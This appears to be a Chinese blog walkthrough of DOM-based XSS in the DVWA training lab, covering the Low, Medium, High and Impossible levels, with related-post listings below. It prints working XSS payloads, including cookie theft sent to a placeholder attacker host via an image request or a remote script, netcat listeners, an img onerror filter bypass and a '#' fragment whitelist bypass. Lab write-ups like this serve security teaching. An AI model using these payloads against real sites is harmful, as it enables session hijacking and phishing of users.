DVWA-XSS(DOM)G

最新推荐文章于 2025-05-22 06:44:09 发布
最新推荐文章于 2025-05-22 06:44:09 发布
阅读量186 收藏
点赞数
分类专栏: DVWA 文章标签: 安全 cookie web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/chenzzhenguo/article/details/108755400
版权
本文详细探讨了XSS攻击的各种应用场景,包括利用XSS获取cookie、重定向、钓鱼网站和DDOS等。重点讲解了DOM型XSS,分析了Low、Medium、High和Impossible四个等级的漏洞特点及利用方式,阐述了如何通过修改DOM节点进行攻击,并给出了实例展示。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

文章目录

XSS的应用场景

  1. 利用XSS获得cookie
  2. 重定向
  3. 钓鱼网站
  4. DDOS

DOM型XSS

文本对象模式xss,通过修改页面的DOM节点形成的XSS,可存储型,可反射型,只取决于输出地点。

一、Low等级

1、漏洞分析

<?php

# No protections, anything goes

?>
  • 没任何保护

2.漏洞利用

2.1重定向
<script>window.location='http://www.163.com'</script>

2.2获取cookie

  • 直接弹出来
    <script>alert(document.cookie)</script>
  • 弹到A主机上

在A主机上开启监听
nc -nvlp 80
在输入点,输入以下内容
<script>new Image().src="htttp://../../..?output="+document.cookie;</script>

  • 通过加载远程js脚本,将cookie弹到Aa主机上

在远程服务器上制作一个js脚本

var img=new Image();
img src='http://../../../:8888/cookie.php?cookie='+document.cookie;

在远程服务器上开启web服务
service apache2 start
开启监听
nc -nlvp 8888
在输入点,输入以下内容

<script src='http://../../getcookie.js'></script>

二、Medium等级

1、漏洞分析

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {
    $default = $_GET['default'];
    
    # Do not allow script tags
    if (stripos ($default, "<script") !== false) {
        header ("location: ?default=English");
        exit;
    }
}

?>
  • 简单过滤,检测到<script,即置为English

2、使用其他标签绕过
</select><img src='x' onerror='document.cookie'>

因为在<select>中不能添加img,所以要先闭合</select>

其他操作,同Low等级

三、High等级

1、漏洞分析

<?php

// Is there any input?
if ( array_key_exists( "default", $_GET ) && !is_null ($_GET[ 'default' ]) ) {

    # White list the allowable languages
    switch ($_GET['default']) {
        case "French":
        case "English":
        case "German":
        case "Spanish":
            # ok
            break;
        default:
            header ("location: ?default=English");
            exit;
    }
}

?>
  • 白名单过滤,只有四种可以选择,其他输入,都会置为English

2、利用#特性绕过
default=English #<script>alert(document.cookie)</script>

在url中#之后的值不会传给服务器

四、Impossible等级

1、安全性分析

<?php

# Don't need to do anything, protction handled on the client side

?>
  • 保护的代码在客户端里面
if (document.location.href.indexOf("default=") >= 0) {
						var lang = document.location.href.substring(document.location.href.indexOf("default=")+8);
						document.write("<option value='" + lang + "'>" + (lang) + "</option>");
						document.write("<option value='' disabled='disabled'>----</option>");
					}
					    
					document.write("<option value='English'>English</option>");
					document.write("<option value='French'>French</option>");
					document.write("<option value='Spanish'>Spanish</option>");
					document.write("<option value='German'>German</option>");
  • 对输入的参数并没有进行URL解码
  • 输入的任何参数,都是经过URL编码,然后直接赋值给option标签
  • 所以不存在XSS漏洞

上一篇:弱会话ID
下一篇:XSS(反射型和存储型)

DVWA -XSS(Stored)-通关教程-完结
刘箫-技术库
04-11 3405
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DVWA -XSS(Reflected)-通关教程-完结
刘箫-技术库
04-11 2655
XSS 攻击全称跨站脚本攻击。是指用户在 Web 页面中提交恶意脚本,从而使浏览包含恶意脚本的页面的用户在不知情的情况下执行该脚本,导致被攻击的行为。​ 与 SQL 注入类似,XSS 也是利用提交恶意信息来实现攻击效果的攻击行为。但是 XSS 一般提交的是 Javascript 脚本,运行在 Web 前端,也就是用户的浏览器;而 SQL 注入提交的SQL 指令是在后台数据库服务器执行。所以两者攻击的对象是不一样的。
DOM
G_66_hero的博客
04-04 326
1.1 文档:DOM中的“D” DOM代表着加载到浏览器窗口的当前网页。document对象的主要功能就是处理网页内容。如果没有document(文档),DOM也就不从谈起。当创建了一个网页并把它加载到Web浏览器中时,DOM就在幕后悄然而生。它把你编写的网页文档转换为一个文档对象。 1.2 对象:DOM中的“O” “对象”是一种自足的数据集合。与某个特...
XSS跨站脚本攻击(DVWA XSS攻击详解、XSS平台搭建)
tmzy1的博客
03-20 2583
XSS攻击、XSS平台搭建
♥️Javascript之DOM♥️
欢迎
09-10 2244
目录 节点 Node类型 属性 方法 Document类型 属性 DOM编程界面 查找元素 添加元素 Element类型 属性 Text类型 属性和方法 文档对象模型(DOM)是网页的编程接口。它给文档(结构树)提供了一个结构化的表述并且定义了一种方式——程序可以对结构树进行访问,以改变文档的结构,样式和内容。 浏览器会根据DOM模型,将结构化文档(比如HTML和XML)解析成一系列的节点,再由这些节点组成一个树状结构(DOM T...
DVWA--XSS (DOM)
When you collect everything, you understand nothing.
09-09 446
0x00简介 DOM XSS漏洞是基于文档对象模型(Document Object Model,DOM)的一种漏洞。DOM是一个与平台、编程语言无关的接口,它允许程序或脚本动态地访问和更新文档内容、结构和样式,处理后的结果能够成为显示页面的一部分。 DOM中有很多对象,其中一些是用户可以操纵的,如url、location、refere等。客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不...
DVWA-XSS(DOM)
weixin_44866139的博客
01-29 2876
XSS 简介 参考链接 XSS(Cross Site Script),全称跨站脚本攻击,为了与 CSS(Cascading Style Sheet) 有所区别,所以在安全领域称为 XSSXSS 攻击,通常指黑客通过 HTML 注入 篡改网页,插入恶意脚本,从而在用户浏览网页时,控制用户浏览器的一种攻击行为。 DOM—based XSS漏洞的产生 DOM—based XSS漏洞是基于文档对象模型...
DVWA--DOMXSS(初中高)
firecjh的博客
06-09 501
2)在界面出现弹框,弹框内容为本人姓名拼音。(使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。使用参数“#”进行截断,其后添加相应的注入命令,因为“#” 后的参数只在浏览器端显示,并不会传送到服务器端,也就不会被过滤。选择“View Source”查看源程序,发现对参数进行了判断,如果不是选项,则使用默认的参数“English”。使用> 进行参数闭合,再添加DOM标签参数进行XSS注入。
DVWA-XSS 通关挑战
weixin_71090536的博客
08-27 382
此文章是XSS漏洞练习,靶场是 DVWAXSS分为反射型、存储型和DOM型,由于DOM型并不常见,故在此演示前两种类型的通关过程。
DVWA-xss-dom
AI_SumSky的博客
11-27 5132
xssdom DOM XSS:通过修改页面的DOM节点形成的XSS。 可触发DOM-XSS的属性: document.referer ,window.name ,location, innerHTML, document.write low级别 提交参数发现是以get的方式提交的,可以尝试注入 注入pyload:发现产生js弹窗,证明存在xss漏洞 分析源码发现后端没有对参数的输出和输入做任何处理 medium级别 分析源码发现对<script做了过滤,当存在<script,页面就
DVWA-XSS (Reflected)
qq_45751902的博客
04-25 389
目录简介安全级别:Low安全级别:Medium安全级别:Impossible防护总结 简介 XSS(cross-site scripting) 跨站脚本攻击,通过web站点漏洞,向客户端交付恶意脚本代码,这些代码可以被浏览器成功的执行,从而实现对客户端的攻击; XSS可以盗取客户端cookie,将客户端重定向到第三方网站; 客户端脚本语言 弹窗警告、广告; JavaScript; 在浏览器中执行; XSS漏洞类型 存储型XSS;(持久型) 恶意代码被保存到目标网站的服务器中,每次用户访问时都会执
DVWA-master】xss(DOM)(详)
Mw18211406853的博客
10-10 1082
查看源代码,会发现会含有<script的代码会出现报错,直接统一返回English,按F12查看页面的html,查看select那部分就是提交的那部分default+8,+8刚好就是等号的后面,代码会把等号后面的东西转给option,进行一系列操作,所以可以在option那里插入我们的代码,要避开被过滤可以把前面的闭合,把代码放在后面,就可以执行恶意代码了,可以看到把select和option闭合就可以了,但是不能用<script>标签了,可以用img或body标签。这里利用#的机制,绕过后台的过滤。
玩转DVWAXSS DOM
key01362000的博客
09-29 1175
DVWAXSS DOM攻击
DVWA - XSS DOM (low)
qq_42630215的博客
06-04 465
low级别 XSS,全称Cross Site Scripting,即跨站脚本攻击,某种意义上也是一种注入攻击,是指攻击者在页面中注入恶意的脚本代码,当受害者访问该页面时,恶意代码会在其浏览器上执行,需要强调的是,XSS不仅仅限于JavaScript,还包括flash等其它脚本语言。根据恶意代码是否存储在服务器中,XSS可以分为存储型的XSS与反射型的XSSDOM型的XSS由于其特殊性,常常被分为第三种,这是一种基于DOM树的XSS。 可能触发DOMXSS的属性:document.referer 属性wi
WEB安全--Java安全--shiro550反序列化漏洞
m0_74800552的博客
05-16 624
shiro550反序列化
移动安全与API安全
最新发布
2402_86373248的博客
05-22 570
通过本部分学习,将掌握移动应用逆向工程、API接口漏洞挖掘与防护的核心技能,覆盖从客户端到服务端的全链路攻防能力。:参与HackTheBox中Mobile/API类靶机(如“SecretAPI”)使用Burp Suite测试API接口的IDOR漏洞(越权访问他人订单):Hook网络库(OkHttp/Retrofit)获取加密前的原始请求。启用WAF(如Cloudflare API Shield):遵循GDPR/PCI DSS对API数据流动的加密规范。:强类型Schema(如JSON Schema)
网络安全-等级保护(等保) 2-7-4 GB/T 25058—2019 第8章 安全运行与维护 第9章 定级对象终止
项目管理到售前,一路成长的伙伴!
05-19 1205
根据不同的安全保护等级要求的控制粒度,分析所需要运行管理控制内容,并以此定义不同运行管 理角色的职责。
TDengine 安全部署配置建议
TDengine(老段)专注时序数据库领域
05-19 1158
数据安全是 TDengine 产品的一项关键指标,这些措施旨在保护 TDengine 部署免受未经授权的访问和数据泄露,同时保持性能和功能。但 TDengine 自身的安全配置不是生产中的唯一保障,结合用户业务系统制定更加匹配客户需求的解决方案更加重要。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值